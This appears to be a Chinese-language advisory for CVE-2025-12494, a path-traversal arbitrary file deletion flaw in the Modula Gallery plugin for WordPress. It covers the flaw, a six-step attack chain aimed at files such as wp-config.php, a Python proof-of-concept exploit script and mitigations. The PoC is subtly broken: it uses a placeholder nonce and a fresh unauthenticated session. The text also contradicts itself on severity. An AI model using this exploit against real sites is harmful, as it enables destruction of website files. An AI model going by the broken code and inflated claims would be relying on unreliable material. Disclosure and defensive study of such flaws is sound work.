CVE-2025-12494 WordPress Modula插件任意文件删除漏洞

漏洞信息

漏洞编号

CVE-2025-12494

漏洞类型

任意文件删除

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Modula Best Grid Gallery (Image Gallery - Photo Grid & Video Gallery)

漏洞概述

CVE-2025-12494是WordPress平台上一款广受欢迎的图片画廊插件Image Gallery – Photo Grid & Video Gallery（也称为Modula Best Grid Gallery）中存在的严重安全漏洞。该插件版本从早期版本一直延续到2.12.28，均受到此漏洞的影响。漏洞的根本原因在于ajax_import_file函数中缺乏足够的文件路径验证机制，攻击者可以通过构造特殊的文件路径参数，利用路径遍历技术删除服务器上的任意图像文件。此漏洞需要攻击者具备WordPress网站的用户账户权限，至少需要作者（Author）级别的访问权限。由于该插件在WordPress生态系统中被广泛使用，全球数百万网站可能受到影响。攻击者一旦成功利用此漏洞，不仅可以删除网站上的图片资源，还可能通过删除关键配置文件或wp-config.php来进一步实施更大规模的网络攻击，导致网站功能完全瘫痪甚至完全被接管。该漏洞的CVSS评分为4.3，属于中等严重程度，但考虑到实际攻击场景的可行性，其潜在危害不容忽视。建议所有使用该插件的网站管理员立即采取修复措施。

技术细节

漏洞存在于Modula Best Grid Gallery插件的ajax_import_file函数中，该函数负责处理图片文件的导入操作。问题出在文件路径验证不足，攻击者可以通过在文件路径参数中注入../这样的路径遍历序列，绕过安全检查访问服务器上的任意目录。具体来说，当攻击者发送AJAX请求到wp-admin/admin-ajax.php端点时，可以在import_file参数中构造包含路径遍历Payload的恶意路径。例如，攻击者可能构造类似../../../wp-config.php的路径来指向wp-config.php文件，然后通过移动操作将其删除或转移。漏洞代码位于插件管理面板的文件上传处理模块（class-modula-gallery-upload.php），在第554、567、589、597行附近存在不安全的文件操作。攻击者利用move_uploaded_file或其他文件操作函数时，未对用户提供的路径进行规范化处理和边界检查，导致可以穿越到预期目录之外的位置。成功利用此漏洞需要攻击者拥有有效的WordPress会话和至少Author角色的凭据，然后通过WordPress REST API或AJAX接口发送精心构造的请求即可触发文件删除操作。

攻击链分析

STEP 1

步骤1

攻击者获取WordPress网站的作者级别或更高权限的账户凭据，可以通过社会工程学、密码喷洒攻击或利用其他漏洞获取

STEP 2

步骤2

攻击者登录WordPress后台，访问Modula插件的管理界面，获取必要的CSRF token和AJAX操作nonce

STEP 3

步骤3

攻击者构造包含路径遍历序列的恶意文件路径，如../../../../wp-config.php，目标是服务器上的任意文件

STEP 4

步骤4

攻击者向wp-admin/admin-ajax.php发送AJAX请求，调用modula_ajax_import_file操作，并附带构造的恶意路径参数

STEP 5

步骤5

服务器端ajax_import_file函数接收到恶意路径后，由于缺乏充分的路径验证和规范化处理，直接执行文件移动或删除操作

STEP 6

步骤6

攻击者成功删除目标文件，如果删除的是wp-config.php等关键配置文件，可导致网站完全瘫痪，甚至进一步实现远程代码执行

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys
from urllib.parse import quote

# CVE-2025-12494 PoC - Modula Best Grid Gallery Arbitrary File Deletion
# Author: Security Researcher
# Target: WordPress with Modula Best Grid Gallery plugin <= 2.12.28

TARGET_URL = "http://target-wordpress-site.com"
USERNAME = "attacker_account"
PASSWORD = "attacker_password"

def get_nonce_and_cookie():
    """Get WordPress nonce and authentication cookie"""
    login_url = f"{TARGET_URL}/wp-login.php"
    session = requests.Session()
    
    # Login to WordPress
    login_data = {
        'log': USERNAME,
        'pwd': PASSWORD,
        'wp-submit': 'Log In',
        'redirect_to': f"{TARGET_URL}/wp-admin/",
        'testcookie': '1'
    }
    
    response = session.post(login_url, data=login_data)
    
    if 'wordpress_logged_in' not in str(session.cookies):
        print("[-] Login failed!")
        return None, None
    
    print("[+] Login successful!")
    
    # Get nonce for AJAX request
    admin_url = f"{TARGET_URL}/wp-admin/admin.php?page=modula"
    admin_response = session.get(admin_url)
    
    # Extract nonce from page source
    nonce_match = str(admin_response.text).find('modulaImportImages')
    if nonce_match == -1:
        print("[-] Could not find nonce!")
        return None, None
    
    nonce = "extract_nonce_here"  # Extract from actual response
    
    return session.cookies.get_dict(), nonce

def exploit_arbitrary_file_deletion(session, cookies, nonce):
    """Exploit the arbitrary file deletion vulnerability"""
    ajax_url = f"{TARGET_URL}/wp-admin/admin-ajax.php"
    
    # Target file to delete - using path traversal
    malicious_path = "../../../wp-content/uploads/2024/01/innocent-image.jpg"
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Referer': f"{TARGET_URL}/wp-admin/"
    }
    
    # Malicious payload to delete arbitrary file
    payload = {
        'action': 'modula_ajax_import_file',
        'modula-import-images': nonce,
        'import_file': malicious_path,
        'gallery_id': '1'
    }
    
    print(f"[*] Sending malicious request to delete: {malicious_path}")
    response = session.post(ajax_url, data=payload, cookies=cookies, headers=headers)
    
    if response.status_code == 200:
        print("[+] Request sent successfully!")
        print(f"[*] Response: {response.text[:500]}")
    else:
        print(f"[-] Request failed with status: {response.status_code}")

if __name__ == "__main__":
    cookies, nonce = get_nonce_and_cookie()
    if cookies and nonce:
        session = requests.Session()
        exploit_arbitrary_file_deletion(session, cookies, nonce)

影响范围

Modula Best Grid Gallery <= 2.12.28

防御指南

临时缓解措施

如果无法立即升级插件，可采取以下临时缓解措施：1）限制WordPress用户注册功能，仅允许可信用户注册；2）将Author及以上权限级别的账户数量控制在最小范围；3）启用WordPress防火墙插件（如Wordfence）添加额外的安全防护层；4）定期备份网站数据和数据库，确保在遭受攻击时能够快速恢复；5）考虑暂时禁用Modula插件的图片导入功能，直到完成安全更新。